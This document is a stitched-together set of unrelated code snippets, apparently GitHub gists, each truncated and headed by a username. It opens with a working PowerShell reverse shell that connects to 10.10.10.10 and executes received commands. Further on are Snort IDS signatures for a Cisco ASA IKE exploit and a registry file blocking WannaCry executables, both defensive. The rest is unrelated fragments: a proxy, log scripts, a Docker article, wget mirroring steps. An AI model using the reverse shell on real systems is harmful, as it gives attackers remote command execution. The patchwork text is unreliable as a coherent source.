egre55

# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

fox-srt

# IDS signatures for https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1:
alert udp any any -> any 500 (msg:"FOX-SRT - Suspicious - Possible Fragmented Cisco IKE/isakmp Packet HeapSpray (CVE-2018-0101)"; flow:to_server; content:"|84|"; offset:16; depth:1; content:"|02|"; distance:1; within:1; fast_pattern; byte_test:4,>,5000,5,relative; byte_test:2,>,5000,11,relative; byte_extract:4,36,fragment_match; byte_test:4,=,fragment_match,53,relative; byte_test:4,=,fragment_match,137,relative; byte_test:4,=,fragment_match,237,relative; threshold:type limit, track by_dst, count 1, seconds 600; classtype:attempted-admin; sid:21002339; rev:5;)
alert udp any any -> any 500 (msg:"FOX-SRT - Exploit - Possible Shellcode in Cisco IKE/isakmp - tcp/CONNECT/"; content:"tcp/CONNECT/"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 600; priority:1; classtype:attempted-admin; sid:21002340; rev:2;)

regevbr

"use strict";

const http = require('http');
const request = http.request;
const net = require('net');
const httpProxy = require('http-proxy');

let auth = "secret-string";
auth = new Buffer(auth).toString('base64');
auth = "Basic " + auth;

youkergav

# Define imports.
from time import time, strftime
from datetime import datetime
from glob import iglob
from os import path, system
from sys import exc_info
from subprocess import Popen, PIPE
from curses import initscr, noecho, cbreak, echo, nocbreak, endwin
from psycopg2 import connect

poisa

#!/bin/sh
dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )

if [ "$1" != "" ]; then
	letter1=$(echo "$1" | tr '[:upper:]' '[:lower:]' | cut -b1)
	if [[ $letter1 == [a-zA-Z0-9] ]]; then
		if [ -f "$dir/data/$letter1" ]; then
			grep -ai "^$1" "$dir/data/$letter1"
		else
			letter2=$(echo "$1" | tr '[:upper:]' '[:lower:]' | cut -b2)

baymaxium

原文：Docker

Docker 一直是第三方开发人员关注的重点，很多项目扩展、补充或增强了 Docker，从日志工具到数据库工具等。因此，在这篇文章中，我们将介绍一些实用且开源的第三方工具，让您的容器开发如虎添翼。以下排名不分先后。

1、Kubernetes

WangYihang

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 一个简单的 Socks5 代理服务器 , 只有 server 端 , 而且代码比较乱
# 不是很稳定 , 而且使用多线程并不是 select 模型
# Author : WangYihang <[email protected]>


import socket
import threading
import sys

ruanbekker

#!/bin/bash

# variables
LOGFILE="/var/log/nginx/access.log"
LOGFILE_GZ="/var/log/nginx/access.log.*"
RESPONSE_CODE="200"

# functions
filters(){
grep $RESPONSE_CODE \

mikewlange

BEST WAY TO DOWNLOAD FULL WEBSITE WITH WGET
I show two ways, the first way is just one command that doesnt run in the background - the second one runs in the background and in a different "shell" so you can get out of your ssh session and it will continue either way
First make a folder to download the websites to and begin your downloading: (note if downloading www.kossboss.com, you will get a folder like this: /websitedl/www.kossboss.com/ )

(STEP1)

mkdir /websitedl/
cd /websitedl/

(STEP2)

Neo23x0

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskdl.exe]
"Debugger"="taskkill /F /IM "

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskse.exe]
"Debugger"="taskkill /F /IM "

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wannacry.exe]
"Debugger"="taskkill /F /IM "